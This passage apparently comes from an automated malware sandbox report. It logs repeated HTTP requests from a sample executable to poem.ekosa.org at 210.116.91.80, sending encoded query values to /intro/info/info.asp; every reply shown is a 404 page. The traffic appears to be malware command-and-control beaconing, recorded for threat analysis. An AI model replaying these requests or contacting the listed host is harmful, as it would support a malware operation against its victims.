      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:23.581068039 CET5302INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:23 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      253192.168.2.450033210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:23.861730099 CET5303OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:24.129415989 CET5303INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:23 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      254192.168.2.450034210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:24.396656990 CET5304OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:24.659502029 CET5305INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:24 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      255192.168.2.450035210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:25.035551071 CET5305OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:25.298223972 CET5306INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:24 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      256192.168.2.450036210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:25.567418098 CET5307OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:25.828813076 CET5307INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:25 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      257192.168.2.450037210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:26.094739914 CET5308OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:26.354414940 CET5308INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:25 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      258192.168.2.450038210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:26.753338099 CET5309OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:27.024575949 CET5310INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:26 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      259192.168.2.450039210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:27.299591064 CET5310OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:27.564192057 CET5311INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:26 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      26192.168.2.449790210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:12.345470905 CET397OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:12.610202074 CET397INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:12 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      260192.168.2.450040210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:27.832099915 CET5312OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:28.093781948 CET5312INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:27 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      261192.168.2.450041210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:28.470154047 CET5313OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:28.729583979 CET5313INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:27 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
